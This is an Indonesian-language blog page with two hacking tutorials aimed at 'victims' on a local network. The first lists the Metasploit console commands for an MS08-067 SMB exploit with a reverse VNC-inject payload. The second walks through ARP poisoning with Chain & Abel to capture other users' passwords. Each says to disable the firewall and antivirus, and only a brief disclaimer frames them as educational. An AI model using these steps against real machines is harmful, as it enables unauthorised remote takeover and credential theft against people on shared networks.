EXPLOIT - METASPLOIT V3.2

Exploit adalah memanfaatkan kelemahan sistem untuk aktifitas-aktifitas di luar penggunaan yang wajar. Exploit banyak digunakan untuk penentrasi baik secara legal ataupun ilegal untuk mencari kelemahan (Vulnerability) pada komputer tujuan. Bisa juga dikatakan sebuah perangkat lunak yang menyerang kerapuhan keamanan (security vulnerability) yang spesifik namun tidak selalu bertujuan untuk melancarkan aksi yang tidak diinginkan.

Ok, langsung saja tanpa basa-basi sobat blogger. Sebelum melancarkan misi,sebaiknya download dahulu tool metasploit disini.. dan tool nmap dimari..

Sebelum melakukan misi, sebaiknya firewall dan antivirus didisable terlebih dahulu supaya tool bekerja secara maksimal. Tutorial ini bekerja pada jarinngan LAN.

Setelah selesai download, langsung install software di kompie sobat blogger..

Jika semua sudah beres,ikuti langkah berikut ini: 

1. Cari IP korban. Bisa menggunakan chain abel, netscan, netcut, dll.
2. Jika sudah, scan IP korban menggunakan nmap. Ex: nmap -v -O -p445 ip target.

keterangan: -v = verbose, -O = lihat informasi OS korban, -p445 = mencari info port 445

    3.  Jalankan software metasploitnya.

    4.  Klik windows, lalu pilih console.

    5.  Ketik "use windows/smb/ms08_067_netapi"

Lalu ketik "show payloads" untuk melihat payload - paayload yang ada.

    6.  Ada tulisan "windows/vncinject/reverse_tcp" nah ini yang akan kita manfaatkan.

         ketik "set PAYLOAD windows/vncinject/reverse_tcp"

         sampai kluar tulisan "PAYLOAD => windows/vncinject/reverse_tcp"

    7.  Ketik "set rhost ip korban"

         sampai keluar tulisan "lhost => ip korban"
         terus ketik lagi "lhost ip kita"
         sampe keluar tulisan "lhost => ip kita"

    8.  Terakhir ketik "exploit" tunggu sampe keluar tab baru pada taskbar.

Selesai deh ^.^. Tutorial exploit ini saya ambil salah satu dari berbagai macam cara exploit. Selanjutnya saya tidak bertanggung jawab atas dampak yang ditimbulkan apabila sobat blogger menyalahgunakannya. Pesan saya tetap think positive dan jadilah white hacker yang selalu memajukan dunia Network Security.

Selengkapnya...

PACKET SNIFFING - CHAIN & ABEL

Chain and Abel merupakan sebuah Tool Hacking popular yang sederhana dan mudah digunakan.
Dengan tool chain ini, kita dapat menangkap lalu lintas paket dari komputer korban yang terkoneksi internet, tak terkecuali username dan password. Tool inilah yang dilakukan para hacker untuk melakukan aksi sniffing via LAN.

Yang dibutuhkan adalah:

1. Software chain & abel yang dapat didownload disini.
2. Makanan dan minuman ringan. he . . he. .

Sebelum melakukan aksi, firewall dan antivirus mohon didisable supaya tool chain ini dapat bekerja secara maksimal.

Langkah-langkah yang dilakukan:

1. Download tool chain & abel.
2. Install di komputer.
3. Sebelum membuka software, lihat dulu IP Address kamu sehingga dalam proses sniffing IP Address kamu tidak tersniffing.
4. Klik Icon chain di desktop.

Berikut adalah gambar-gambar proses penggunaan chain:

1.  Klik start/stop sniffer

2.  Klik tab sniffer, klik kanan pada tabel kosong lalu pilih Scan MAC Addresses.

3.  Muncul MAC Address Scanner. Klik "All hosts in my subnet" dan centang "All Test".

4.  Hasil dari MAC Address Scanner

5.  Pada kotak kiri klik IP server dan pada kotak kanan klik IP korban. Lakukan berulang-ulang untuk sniffing semua IP adress korban yang ada.

6.  Setelah selesai lakukan proses poisoning terhadap semua IP korban. Lihat gambar diatas.

7.  Untuk hasilnya, silahkan klik tab password pada bagian bawah dan klik HTTP, lihat gambar.

Tutorial ini saya tulis bertujuan untuk pengetahuan para sahabat yang ingin mengenal apa itu dunia hacking. Jadi, jika dalam realitanya tutorial ini disalah gunakan,, penulis tidak akan bertanggung jawab atas dampak yang ditimbulkan. Pesan saya jadilah white hacker yang selalu memajukan dunia Network Security ^.^



Source:
http://www.oxid.it
http://sectools.org/sniffers.html

Selengkapnya...